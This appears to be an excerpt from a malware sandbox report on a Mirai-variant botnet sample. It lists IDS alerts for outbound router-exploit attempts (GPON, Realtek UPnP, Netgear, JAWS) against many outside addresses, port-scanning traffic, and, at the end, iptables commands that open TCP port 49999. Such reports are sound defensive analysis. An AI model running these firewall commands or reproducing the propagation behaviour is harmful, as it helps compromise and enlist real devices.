                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:44930 -> 48.71.73.50:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:49924 -> 50.191.49.171:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:41216 -> 212.175.190.28:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:35532 -> 115.248.132.47:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:33476 -> 46.14.252.194:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:54866 -> 212.19.173.191:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:48190 -> 150.49.139.129:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:46456 -> 149.193.148.34:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:33724 -> 22.47.205.194:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:36408 -> 157.88.62.35:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:48332 -> 197.204.137.58:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:49822 -> 70.136.186.81:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:32920 -> 43.136.192.62:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:32860 -> 11.48.182.3:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:51940 -> 144.80.221.222:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:59030 -> 68.104.71.243:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:48828 -> 101.130.93.192:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:58046 -> 76.231.140.115:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:33858 -> 14.239.128.170:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:44338 -> 189.229.175.122:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:33202 -> 153.157.254.30:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:55090 -> 48.90.206.169:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:37876 -> 70.159.0.172:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:43626 -> 214.111.203.47:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53654 -> 48.137.212.42:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53304 -> 182.227.110.28:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:44440 -> 179.184.84.34:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:51870 -> 90.153.54.244:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53778 -> 162.60.224.62:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:50486 -> 73.177.193.220:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:32856 -> 191.77.140.153:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:49890 -> 152.96.212.208:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:55692 -> 182.149.46.3:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:34086 -> 215.189.147.100:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46674 -> 46.158.65.38:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:51896 -> 167.99.9.19:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:58840 -> 137.0.42.238:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59172 -> 53.247.144.247:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60282 -> 67.239.51.13:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60282 -> 67.239.51.13:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51472 -> 218.131.151.144:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:59172 -> 53.247.144.247:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51472 -> 218.131.151.144:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:54150 -> 3.123.123.11:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:56564 -> 158.202.203.74:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59810 -> 46.30.194.244:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42546 -> 53.194.83.148:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40470 -> 192.152.41.193:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:50090 -> 5.233.117.120:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54556 -> 103.73.217.56:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52436 -> 5.178.52.148:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37686 -> 25.107.103.6:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44486 -> 161.247.139.55:49152
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:36264 -> 92.188.86.111:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42798 -> 171.151.107.153:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47122 -> 106.191.238.168:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51266 -> 186.168.207.252:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55512 -> 61.94.178.230:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:54940 -> 181.205.181.133:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49982 -> 104.107.170.197:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49620 -> 133.45.42.63:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:37346 -> 9.144.121.102:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49234 -> 106.176.148.33:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40176 -> 25.5.193.190:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38588 -> 102.194.156.24:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38588 -> 102.194.156.24:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58674 -> 161.171.33.41:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:37220 -> 194.163.148.125:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:48762 -> 138.35.154.46:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:41978 -> 24.69.76.39:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35610 -> 194.236.130.103:7574
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:43382 -> 135.110.147.149:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54102 -> 42.222.208.96:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54102 -> 42.222.208.96:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41926 -> 211.50.44.136:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43734 -> 59.239.132.121:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36650 -> 1.22.227.114:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:45692 -> 153.204.123.98:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:36650 -> 1.22.227.114:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40206 -> 220.207.0.34:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39694 -> 28.121.234.171:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40206 -> 220.207.0.34:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34558 -> 193.30.177.99:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33984 -> 115.161.205.163:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41080 -> 97.161.172.134:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56934 -> 200.25.215.133:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47624 -> 186.183.0.155:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38272 -> 3.102.151.229:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48798 -> 51.253.191.104:49152
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38272 -> 3.102.151.229:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53504 -> 40.104.249.146:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53504 -> 40.104.249.146:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60250 -> 197.135.110.12:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43242 -> 136.179.98.225:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56754 -> 198.31.34.13:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56754 -> 198.31.34.13:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:47766 -> 94.134.232.205:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35882 -> 4.167.46.138:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59258 -> 19.1.163.59:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:37802 -> 79.129.72.164:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54280 -> 108.221.254.110:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46886 -> 72.121.179.235:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:46886 -> 72.121.179.235:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:56476 -> 203.102.228.87:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:36132 -> 207.54.29.76:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:58148 -> 200.230.30.18:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:57208 -> 103.231.22.13:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:50988 -> 217.144.221.208:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:33744 -> 158.86.239.37:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:45958 -> 164.50.155.210:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:59802 -> 189.65.195.18:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:59014 -> 132.49.92.222:8080
                            Source: global trafficTCP traffic: 176.86.103.29 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 8.84.61.38 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 99.162.112.187 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 85.52.221.218 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 173.224.150.117 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 81.72.56.112 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 129.224.247.20 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 156.177.99.179 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 144.147.141.226 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 91.191.108.134 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 55.139.42.174 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 168.216.138.12 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 98.35.241.78 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 16.226.189.211 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 40.156.170.132 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 94.177.142.161 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 220.130.230.90 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 58.25.214.119 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 110.77.244.54 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 144.192.196.181 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 25.128.176.48 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 120.96.177.206 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 197.72.9.100 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 216.25.147.56 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 154.235.218.105 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 109.102.97.141 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 221.56.144.117 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 45.52.252.78 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 109.25.203.105 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 185.35.83.146 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 157.184.128.35 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 5.174.228.198 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 140.49.192.11 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 189.98.38.229 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 146.136.103.163 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 1.213.1.223 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 43.33.231.8 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 113.11.42.76 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 23.202.41.211 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 177.124.131.210 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 180.188.222.161 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 133.125.92.48 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 185.249.96.80 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 35.167.30.58 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 73.58.211.50 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 48.117.0.63 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 66.99.16.40 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 190.123.58.154 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 204.19.175.144 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 88.54.117.228 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 171.88.32.116 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 101.203.94.126 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 67.83.201.193 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 153.240.186.210 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 121.177.118.150 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 63.218.221.150 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 157.80.252.25 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 32.160.241.63 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 177.37.167.95 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 74.121.250.48 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 117.185.49.141 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 177.141.44.231 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 140.128.108.40 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 106.23.130.140 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 92.101.144.171 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 92.38.181.87 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 113.173.184.52 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 128.91.58.4 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 25.51.174.183 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 18.48.0.22 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 37.133.196.204 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 77.121.98.247 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 96.81.159.236 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 20.164.209.99 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 157.77.71.177 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 188.195.245.36 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 114.134.116.214 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 4.46.56.44 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 79.132.196.216 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 98.179.93.63 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 201.239.180.49 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 116.48.214.197 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 118.197.10.107 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 95.201.182.127 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 191.245.227.83 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 6.202.218.89 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 202.88.157.165 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 41.43.78.104 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 49.192.131.240 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 45.108.234.239 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 178.72.204.4 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 210.207.191.104 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 137.202.127.253 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 115.106.3.245 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 199.176.49.4 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 117.116.60.186 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 17.222.184.219 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 50.184.254.142 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 170.10.186.243 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 119.22.161.221 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 143.151.72.28 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 116.175.89.26 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 121.208.165.185 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 166.196.205.22 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 181.245.251.146 ports 1,2,4,5,9,49152
                            Source: /bin/sh (PID: 6273)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6280)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6283)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6287)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 49999 -j ACCEPTJump to behavior
